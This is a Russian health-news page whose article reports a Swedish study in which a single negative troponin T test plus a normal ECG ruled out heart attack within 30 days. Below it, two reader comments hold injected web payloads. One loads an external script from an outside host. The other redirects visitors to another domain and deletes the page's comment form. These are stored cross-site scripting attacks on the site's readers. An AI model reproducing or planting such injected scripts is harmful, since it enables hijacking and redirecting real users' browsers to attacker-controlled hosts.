Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Один единственный анализ ...  >>  Один единственный анализ скажет, будет у вас инфаркт или нет!
 
Обратная связь
 

Один единственный анализ скажет, будет у вас инфаркт или нет!

Размер шрифта
09 октября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Боль в груди – один из самых страшных симптомов, нередко заставляющих нас вызывать скорую помощь, ведь за болью может скрываться инфаркт. Однако ученым удалось разработать простой и быстрый тест, проведение которого значительно упростит диагностику инфаркта и поможет избежать лишних госпитализаций.

Один единственный анализ скажет, будет у вас инфаркт или нет!

Пациенты, поступившие в отделение экстренной помощи, в крови которых не определяется высокочувствительный биомаркер тропонин Т, а на кардиограмме не выявляются признаки нарушения кровообращения, имеют минимальный риск развития инфаркта в течение 30 дней. Такие данные были получены в исследовании, представленном на Сессии Американского Колледжа Кардиологов.

В исследование было включено 14 636 человек, поступивших в больницы Швеции с 2010 по 2012 годы в связи с болью в груди. У каждого пациента ученые измерили уровень тропонина Т в крови. Тропонин Т является высокочувствительным маркером повреждения сердца. Примерно у 9 000 пациентов тропонин Т в крови не определялся или его уровень составлял менее 5 нг/л, а на их кардиограммах не было обнаружено признаков повреждения сердца или снижения кровотока. Таких пациентов наблюдали в течение 30 дней. Исследователи обнаружили, что отрицательный результат теста на тропонин Т в 99,8% случаев говорит о том, что у данного пациента не разовьется инфаркт. Эта закономерность верна вне зависимости от наличия у пациента факторов риска инфаркта, а также от длительности симптомов.

«Боль в груди – потенциально опасный для жизни симптом, однако стоит отметить, что встречается он очень часто», – говорит доктор Надя Бандштейн из Каролинского Института в Швеции, ведущий автор исследования. «В нашей больнице это второй по частоте симптом у экстренных пациентов. Так как у нас нет доказанного метода для быстрого исключения инфаркта, то нам приходится подолгу держать пациента в больнице без особой необходимости, а это стоит больших денег». Согласно наблюдениям врачей, у пациентов, у которых тропонин в крови не определялся, практически никогда не развивался инфаркт, и они обычно выписывались домой прямо в день поступления.

Высокочувствительный сердечный тропонин Т – сравнительно новый биомаркер, используемый для диагностики инфаркта. Он определяется в крови на несколько часов раньше, чем другие тропонины. Новые клинические рекомендации советуют определять его уровень по крайней мере через три часа после появления боли в груди, при этом многих пациентов госпитализируют для проведения второго анализа и дальнейшего наблюдения. Бандштейн утверждает, что, по данным ее работы, одного анализа на тропонин вполне достаточно, и по его результатам часть пациентов может быть сразу выписана домой.

«Используя для диагностики тест на тропонин Т и кардиограмму, мы сможем избежать от 500 до 1 000 ненужных госпитализаций в год и использовать освободившиеся койки для размещения более тяжелых больных», – говорит Бандштейн. Ученые считают, что это исследование будет иметь огромное значение для 10-15 миллионов пациентов в США и Европе, которые поступают в отделения экстренной помощи с болью в груди каждый год. 

За 30 дней наблюдения у 39 пациентов из 8 907 был диагностирован инфаркт. Это говорит о том, что лишь один из 594 пациентов с болью в груди, без признаков повреждения сердца на кардиограмме и отрицательным результатом анализа на тропонин Т находится в группе риска по развитию инфаркта.

Таким образом, благодаря новым достижениям медицинской науки, можно улучшить процесс диагностики и тем самым значительно облегчить жизнь не только пациентам, но и врачам. Все о сердце в нашем специальном проекте!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:31

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:27

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Не психуй! Взрывы гнева увеличивают шансы инфаркта!   Бегом на улицу! Солнце понижает давление!   Еще один повод ходить на работу! Бедные умирают в 2 раза чаще богатых!   В поисках самого здорового человека  
22 июня 2013Грецкие орехи спасут от инфаркта 20 июня 2013Собака спасет от инфаркта! Какую породу завести, чтобы не умереть
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом!
 

Слайдшоу

1
Зачем спать 10 затем
Что заставит вас храпеть
Чем полезен секс?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.